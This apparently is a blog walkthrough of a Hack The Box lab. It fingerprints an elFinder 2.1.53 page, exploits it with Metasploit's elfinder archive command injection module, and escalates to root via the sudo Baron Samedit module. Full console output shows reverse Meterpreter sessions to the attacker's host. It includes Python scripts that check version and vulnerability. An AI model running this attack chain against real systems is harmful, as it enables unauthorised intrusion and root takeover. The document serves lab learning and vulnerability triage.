Daily Practice
Questions
Solutions
Question 1
┌──(kali㉿HgTrojan)-[~]
└─$ curl 10.129.203.52
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<title>elFinder 2.1.x source version with PHP connector</title>
<!-- Require JS (REQUIRED) -->
<!-- Rename "main.default.js" to "main.js" and edit it if you need configure elFInder 2.1.53 options or any things -->
<script data-main="./main.default.js" src="//cdnjs.cloudflare.com/ajax/libs/require.js/2.3.6/require.min.js"></script>
<script>
define('elFinderConfig', {
// elFinder options (REQUIRED)
// Documentation for client options:
// https://github.com/Studio-42/elFinder/wiki/Client-configuration-options
defaultOpts : {
url : 'php/connector.minimal.php', // or connector.maximal.php : connector URL (REQUIRED)
commandsOptions : {
edit : {
extraOptions : {
// set API key to enable Creative Cloud image editor
// see https://console.adobe.io/
creativeCloudApiKey : '',
// browsing manager URL for CKEditor, TinyMCE
// uses self location with the empty value
managerUrl : ''
}
},
quicklook : {
// to enable CAD-Files and 3D-Models preview with sharecad.org
sharecadMimes : ['image/vnd.dwg', 'image/vnd.dxf', 'model/vnd.dwf', 'application/vnd.hp-hpgl', 'application/plt', 'application/step', 'model/iges', 'application/vnd.ms-pki.stl', 'application/sat', 'image/cgm', 'application/x-msmetafile'],
// to enable preview with Google Docs Viewer
googleDocsMimes : ['application/pdf', 'image/tiff', 'application/vnd.ms-office', 'application/msword', 'application/vnd.ms-word', 'application/vnd.ms-excel', 'application/vnd.ms-powerpoint', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet', 'application/vnd.openxmlformats-officedocument.presentationml.presentation', 'application/postscript', 'application/rtf'],
// to enable preview with Microsoft Office Online Viewer
// these MIME types override "googleDocsMimes"
officeOnlineMimes : ['application/vnd.ms-office', 'application/msword', 'application/vnd.ms-word', 'application/vnd.ms-excel', 'application/vnd.ms-powerpoint', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet', 'application/vnd.openxmlformats-officedocument.presentationml.presentation', 'application/vnd.oasis.opendocument.text', 'application/vnd.oasis.opendocument.spreadsheet', 'application/vnd.oasis.opendocument.presentation']
}
},
// bootCalback calls at before elFinder boot up
bootCallback : function(fm, extraObj) {
/* any bind functions etc. */
fm.bind('init', function() {
// any your code
});
// for example set document.title dynamically.
var title = document.title;
fm.bind('open', function() {
var path = '',
cwd = fm.cwd();
if (cwd) {
path = fm.path(cwd.hash) || null;
}
document.title = path? path + ':' + title : title;
}).bind('destroy', function() {
document.title = title;
});
}
},
managers : {
// 'DOM Element ID': { /* elFinder options of this DOM Element */ }
'elfinder': {}
}
});
</script>
</head>
<body>
<!-- Element where elFinder will be created (REQUIRED) -->
<div id="elfinder"></div>
</body>
</html>
Question 2
The framework is known to be elFinder 2.1.x (the HTML comment returned above names 2.1.53, and the client talks to php/connector.minimal.php). Launch msf:
┌──(root㉿HgTrojan)-[/home/kali]
└─# msfconsole
=[ metasploit v6.3.51-dev ]
+ -- --=[ 2384 exploits - 1235 auxiliary - 418 post ]
+ -- --=[ 1391 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search elFinder
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/builderengine_upload_exec 2016-09-18 excellent Yes BuilderEngine Arbitrary File Upload Vulnerability and execution
1 exploit/unix/webapp/tikiwiki_upload_exec 2016-07-11 excellent Yes Tiki Wiki Unauthenticated File Upload Vulnerability
2 exploit/multi/http/wp_file_manager_rce 2020-09-09 normal Yes WordPress File Manager Unauthenticated Remote Code Execution
3 exploit/linux/http/elfinder_archive_cmd_injection 2021-06-13 excellent Yes elFinder Archive Command Injection
4 exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection 2019-02-26 excellent Yes elFinder PHP Connector exiftran Command Injection
Interact with a module by name or index. For example info 4, use 4 or use exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection
msf6 > use 3
Fill in the module options and run it; we obtain a session as www-data.
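Before reaching for the module, it helps to confirm what the page actually told us. The script below is an added example for this write-up (not elFinder's own code and not part of the Metasploit module): it pulls the `<title>`, the release number hidden in the "Rename main.default.js" comment, and the connector URL out of the HTML that `curl` returned above, and flags the build as a candidate for the archive command injection when it is older than 2.1.59. That cut-off is the editor's assumption taken from the elFinder changelog; the sample HTML is a trimmed copy of the page output above. Pass a base URL on the command line to run it against a live host.

```python
"""Fingerprint an elFinder 2.1.x front page (added example, not project code)."""
import re
import sys
import urllib.request
from urllib.parse import urljoin

# Release number appears in the shipped comment, e.g. "configure elFInder 2.1.53 options".
# The <title> only says "2.1.x", so the three-part pattern skips it on purpose.
VERSION_RE = re.compile(r"elfinder\s+(\d+\.\d+\.\d+)", re.IGNORECASE)
TITLE_RE = re.compile(r"<title>(.*?)</title>", re.IGNORECASE | re.DOTALL)
# The connector path is set as  url : 'php/connector.minimal.php'  inside elFinderConfig.
CONNECTOR_RE = re.compile(r"\burl\s*:\s*'([^']+)'")

# Assumption (editor's, from the elFinder changelog): the archive command
# injection targeted by elfinder_archive_cmd_injection was fixed in 2.1.59.
ARCHIVE_CMDI_FIXED = (2, 1, 59)

# Constructed sample: a trimmed copy of the curl output shown in this write-up.
SAMPLE_HTML = """<!DOCTYPE html>
<html>
<head>
<title>elFinder 2.1.x source version with PHP connector</title>
<!-- Rename "main.default.js" to "main.js" and edit it if you need configure elFInder 2.1.53 options or any things -->
<script>
define('elFinderConfig', {
defaultOpts : {
url : 'php/connector.minimal.php', // or connector.maximal.php : connector URL (REQUIRED)
}
});
</script>
</head>
<body><div id="elfinder"></div></body>
</html>
"""


def parse_version(s):
    """'2.1.53' -> (2, 1, 53) so versions compare numerically, not as strings."""
    return tuple(int(p) for p in s.split("."))


def connector_url(base_url, connector_path):
    """Resolve the relative connector path against the page URL."""
    return urljoin(base_url, connector_path)


def fingerprint(html):
    """Extract title, release number and connector path; decide if the build predates the fix."""
    title = TITLE_RE.search(html)
    ver = VERSION_RE.search(html)
    conn = CONNECTOR_RE.search(html)
    info = {
        "title": title.group(1).strip() if title else None,
        "version": ver.group(1) if ver else None,
        "connector": conn.group(1) if conn else None,
        "archive_cmdi_candidate": None,
    }
    if info["version"]:
        info["archive_cmdi_candidate"] = parse_version(info["version"]) < ARCHIVE_CMDI_FIXED
    return info


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(fingerprint(SAMPLE_HTML))
    else:
        base = sys.argv[1]
        with urllib.request.urlopen(base, timeout=10) as resp:
            page = resp.read().decode("utf-8", "replace")
        info = fingerprint(page)
        if info["connector"]:
            info["connector_url"] = connector_url(base, info["connector"])
        print(info)
```

A "candidate" verdict only means the shipped comment names an old release; operators sometimes patch without touching that string, so the module's own check (which talks to the connector) remains the authoritative test.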
Question 3
According to the question, sudo on the target is vulnerable.
Press Ctrl+Z to background the current Meterpreter session so that a new one can be created:
meterpreter >
Background session 1? [y/N]
msf6 exploit(linux/http/elfinder_archive_cmd_injection) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/linux www-data @ 10.129.203.52 10.10.16.39:4444 -> 10.129.203.52:54160 (10.129.203.52)
msf6 exploit(linux/http/elfinder_archive_cmd_injection) > search sudo 1.8.31
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/local/sudo_baron_samedit 2021-01-26 excellent Yes Sudo Heap-Based Buffer Overflow
Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/local/sudo_baron_samedit
msf6 exploit(linux/http/elfinder_archive_cmd_injection) > use 0
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/sudo_baron_samedit) > show options
Module options (exploit/linux/local/sudo_baron_samedit):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
WritableDir /tmp yes A directory where you can write files.
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.5.10.131 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(linux/local/sudo_baron_samedit) > set session 1
session => 1
msf6 exploit(linux/local/sudo_baron_samedit) > set l
set lengths set lhost set loglevel set lport
msf6 exploit(linux/local/sudo_baron_samedit) > set lhost 10.10.16.39
lhost => 10.10.16.39
msf6 exploit(linux/local/sudo_baron_samedit) > run
[*] Started reverse TCP handler on 10.10.16.39:4444
[!] SESSION may not be compatible with this module:
[!] * incompatible session architecture: x86
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. sudo 1.8.31 may be a vulnerable build.
[*] Using automatically selected target: Ubuntu 20.04 x64 (sudo v1.8.31, libc v2.31)
[*] Writing '/tmp/EaLIXMf51.py' (763 bytes) ...
[*] Writing '/tmp/libnss_Ubl/QLO .so.2' (548 bytes) ...
[*] Sending stage (3045380 bytes) to 10.129.203.52
[+] Deleted /tmp/EaLIXMf51.py
[+] Deleted /tmp/libnss_Ubl/QLO .so.2
[*]
[*] Alternative exploit target(s) exist for this OS version:
[*] 2: Ubuntu 20.04 x64 (sudo v1.8.31, libc v2.31) - alternative
[*] Run `set target <id>` to select an alternative exploit script
[+] Deleted /tmp/libnss_Ubl
[*] Meterpreter session 2 opened (10.10.16.39:4444 -> 10.129.203.52:54646) at 2024-01-19 02:46:28 -0500
meterpreter > shell
Process 20457 created.
Channel 1 created.
^C
Terminate channel 1? [y/N] y
meterpreter > cd /root
meterpreter > ls
Listing: /root
==============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100600/rw------- 178 fil 2022-05-16 11:35:30 -0400 .bash_history
100644/rw-r--r-- 3106 fil 2022-05-16 11:34:51 -0400 .bashrc
040700/rwx------ 4096 dir 2022-05-16 09:46:07 -0400 .cache
040700/rwx------ 4096 dir 2022-05-16 09:46:06 -0400 .config
040755/rwxr-xr-x 4096 dir 2022-05-16 09:46:07 -0400 .local
100644/rw-r--r-- 161 fil 2019-12-05 09:39:21 -0500 .profile
100644/rw-r--r-- 75 fil 2022-05-16 04:45:33 -0400 .selected_editor
040700/rwx------ 4096 dir 2021-10-06 13:37:09 -0400 .ssh
100600/rw------- 13300 fil 2022-05-16 11:34:51 -0400 .viminfo
100644/rw-r--r-- 291 fil 2022-05-16 09:51:29 -0400 .wget-hsts
100644/rw-r--r-- 24 fil 2022-05-16 11:18:40 -0400 flag.txt
040755/rwxr-xr-x 4096 dir 2021-10-06 13:37:19 -0400 snap
meterpreter > cat flag.txt
HTB{5e55ion5_4r3_sw33t}
meterpreter >
With that we have escalated to root and captured the flag. Note two warnings in the run above: the module flagged the x86 session as possibly incompatible, and its automatic check could only say that sudo 1.8.31 "may be" vulnerable, because distributions backport fixes without bumping the version string. The exploit still succeeded here, but on a real engagement confirm the build before firing a heap-overflow exploit at a production host.
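The module's check above was inconclusive for exactly this reason: the version string says 1.8.31, but whether the package was patched is a separate question. The script below is an added example for this write-up (not Metasploit code, and not the module's own check) that does the triage a practitioner would do from the www-data shell before running `sudo_baron_samedit`. It combines two facts from the public advisory for the Sudo heap-based buffer overflow: affected releases run from 1.8.2 to 1.8.31p2 and from 1.9.0 to 1.9.5p1, and on an unpatched sudo the command `sudoedit -s /` answers `sudoedit: /: not a regular file`, whereas a patched sudo prints its usage message. The parsing functions are fed constructed strings so they can be checked offline; the `__main__` block runs the real commands on the host.

```python
"""Triage a host's sudo for the Baron Samedit heap overflow (added example)."""
import re
import subprocess

# "Sudo version 1.8.31" or "Sudo version 1.9.5p2" -> (major, minor, patch, p-level)
VERSION_RE = re.compile(r"Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?")

# Affected ranges from the public advisory: 1.8.2..1.8.31p2 and 1.9.0..1.9.5p1.
AFFECTED_RANGES = (
    ((1, 8, 2, 0), (1, 8, 31, 2)),
    ((1, 9, 0, 0), (1, 9, 5, 1)),
)


def parse_sudo_version(text):
    """Parse the first line of `sudo --version`; None if no version is present."""
    m = VERSION_RE.search(text)
    if not m:
        return None
    major, minor, patch, p = m.groups()
    return (int(major), int(minor), int(patch), int(p or 0))


def version_in_affected_range(v):
    """True if the upstream release number falls inside an affected range.

    This is only a hint: Ubuntu 20.04 kept the 1.8.31 number after backporting
    the fix, so a True here must be confirmed with the behavioural test.
    """
    return any(lo <= v <= hi for lo, hi in AFFECTED_RANGES)


def classify_sudoedit_output(output):
    """Interpret what `sudoedit -s /` printed (run as an unprivileged user).

    vulnerable: the bogus "-s /" reaches the buggy argument rewriting and fails
                on the file check with "not a regular file";
    patched:    the fixed sudo rejects the flag combination with a usage line.
    """
    text = output.strip()
    if "not a regular file" in text:
        return "vulnerable"
    if text.startswith("usage:"):
        return "patched"
    return "unknown"


def triage(version_output, sudoedit_output):
    """Combine both signals into one verdict; behaviour wins over the version string."""
    v = parse_sudo_version(version_output)
    behaviour = classify_sudoedit_output(sudoedit_output)
    if behaviour != "unknown":
        return behaviour
    if v is not None and version_in_affected_range(v):
        return "version-in-range, unconfirmed"
    return "unknown"


if __name__ == "__main__":
    ver = subprocess.run(["sudo", "--version"], capture_output=True, text=True)
    # stdin is closed so a patched sudo cannot sit waiting for a password.
    edit = subprocess.run(["sudoedit", "-s", "/"], capture_output=True, text=True,
                          stdin=subprocess.DEVNULL, timeout=15)
    print("sudo version:", parse_sudo_version(ver.stdout))
    print("verdict:", triage(ver.stdout, edit.stderr + edit.stdout))
```

Run it as the low-privileged user you already have (here www-data); the behavioural test does not need a password and is what distinguishes a backported fix from a genuinely vulnerable build.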
All of my articles are technical write-ups recorded for defensive purposes; every step was carried out in a lab environment. Do not use them for any other purpose; you bear the consequences yourself. Unless otherwise stated, all posts on this blog are licensed under BY-NC-SA. Please credit the source when reposting.
You actually make it seem so easy with your presentation but I find
this topic to be really something which I think I would never understand.
It seems too complicated and extremely broad for me. I'm looking forward to
your next post, I will try to get the hang of it!
Thank you for your love. I hope we can make progress together.